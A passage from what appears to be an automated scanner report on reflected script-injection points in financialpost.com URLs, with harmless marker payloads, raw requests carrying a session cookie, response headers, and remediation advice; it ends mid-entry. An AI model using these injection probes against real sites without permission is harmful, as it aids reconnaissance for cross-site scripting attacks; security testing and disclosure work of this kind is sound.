This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/hr1c50a'%3b34e2fdea153/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43240
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d117'%3b6a5beb61248 was submitted in the REST URL parameter 1. This input was echoed as 8d117';6a5beb61248 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive8d117'%3b6a5beb61248/smart-shift/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37612
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1806'%3b95ff51b1cd7 was submitted in the REST URL parameter 2. This input was echoed as c1806';95ff51b1cd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/smart-shiftc1806'%3b95ff51b1cd7/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43420
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46365'%3b0515ef5e13 was submitted in the REST URL parameter 1. This input was echoed as 46365';0515ef5e13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive46365'%3b0515ef5e13/social+media+worth+investment/3972248/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 79029 Expires: Sun, 19 Dec 2010 03:12:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive46365';0515ef5e13/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive46365';0515ef5e13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=76882130?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf67'%3bc8bd6c0d374 was submitted in the REST URL parameter 3. This input was echoed as dbf67';c8bd6c0d374 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248dbf67'%3bc8bd6c0d374/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70627 Expires: Sun, 19 Dec 2010 03:12:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social-media-worth-investment/3972248dbf67';c8bd6c0d374/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social-media-worth-investment;kw=3972248dbf67';c8bd6c0d374;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord= ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765b9'%3ba07db4f3a59 was submitted in the REST URL parameter 4. This input was echoed as 765b9';a07db4f3a59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248/765b9'%3ba07db4f3a59 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4ce'%3b81b991a8c20 was submitted in the REST URL parameter 1. This input was echoed as 2b4ce';81b991a8c20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive2b4ce'%3b81b991a8c20/women/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43335
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa96'%3bb6cfa407c54 was submitted in the REST URL parameter 2. This input was echoed as 4aa96';b6cfa407c54 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/women4aa96'%3bb6cfa407c54/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44120
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18de6'%3b4749081e3e1 was submitted in the REST URL parameter 1. This input was echoed as 18de6';4749081e3e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images18de6'%3b4749081e3e1/favicon.ico HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:12 GMT Date: Sun, 19 Dec 2010 03:03:12 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43028
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a887a'%3b741dad57e16 was submitted in the REST URL parameter 2. This input was echoed as a887a';741dad57e16 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/a887a'%3b741dad57e16 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:20 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43044
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42deb'%3bac05bd1a0a1 was submitted in the REST URL parameter 1. This input was echoed as 42deb';ac05bd1a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes42deb'%3bac05bd1a0a1/header/ccn-login.html HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:12 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43285
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f71'%3bf62fcd6e2bf was submitted in the REST URL parameter 2. This input was echoed as 71f71';f62fcd6e2bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header71f71'%3bf62fcd6e2bf/ccn-login.html HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:17 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 39220
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172af'%3b120f40364cb was submitted in the REST URL parameter 3. This input was echoed as 172af';120f40364cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header/172af'%3b120f40364cb HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:25 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43251
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290f4'%3b344b87b1ee4 was submitted in the REST URL parameter 1. This input was echoed as 290f4';344b87b1ee4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes290f4'%3b344b87b1ee4/sidebar/most-popular/iframed.html HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:14 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43593
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 678d7'%3bfe2c818c345 was submitted in the REST URL parameter 2. This input was echoed as 678d7';fe2c818c345 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar678d7'%3bfe2c818c345/most-popular/iframed.html HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:19 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 39528
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61041'%3bebbe0febebf was submitted in the REST URL parameter 3. This input was echoed as 61041';ebbe0febebf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar/most-popular61041'%3bebbe0febebf/iframed.html HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:24 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43520
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0cd'%3bffc5ac2518 was submitted in the REST URL parameter 4. This input was echoed as ba0cd';ffc5ac2518 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
